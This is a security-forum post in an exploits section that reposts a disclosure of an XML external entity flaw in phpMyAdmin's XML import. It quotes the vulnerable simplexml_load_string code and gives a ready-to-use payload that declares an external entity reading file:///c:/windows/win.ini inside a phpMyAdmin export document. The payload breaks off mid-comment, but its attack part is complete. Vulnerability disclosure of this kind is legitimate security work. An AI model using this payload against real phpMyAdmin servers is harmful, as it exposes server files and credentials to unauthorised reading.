Jump to content
Nytro

phpMyAdmin Arbitrary File Read

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

phpMyAdmin Arbitrary File Read

phpMyAdmin suffers from a remote arbitrary file reading vulnerability when using a simplexml_load_string function meant to read xml from user input.

Hi

80sec report this bug on wooyun,PhpMyadmin use a simplexml_load_string

function to read xml from user input,this may be exploied to read files

from the server or network

in libraries/import/xml.php,some code like this

/**

 * Load the XML string

 *

 * The option LIBXML_COMPACT is specified because it can

 * result in increased performance without the need to

 * alter the code in any way. It's basically a freebee.

 */

$xml = simplexml_load_string($buffer, "SimpleXMLElement", LIBXML_COMPACT);

unset($buffer);



/**

 * The XML was malformed

 */

if ($xml === FALSE) {

so you just need to make a xml like this

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE wooyun [

  <!ENTITY hi80sec SYSTEM "file:///c:/windows/win.ini">

]>



<pma_xml_export version="1.0" xmlns:pma="
http://www.phpmyadmin.net/some_doc_url/">

    <!--

    - Structure schemas

    -->

    <pma:structure_schemas>

        <pma:database name="test" collation="utf8_general_ci"
charset="utf8">

            <pma:table name="ts_ad">

                &hi80sec;

            </pma:table>

        </pma:database>

    </pma:structure_schemas>



    <!--

-

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...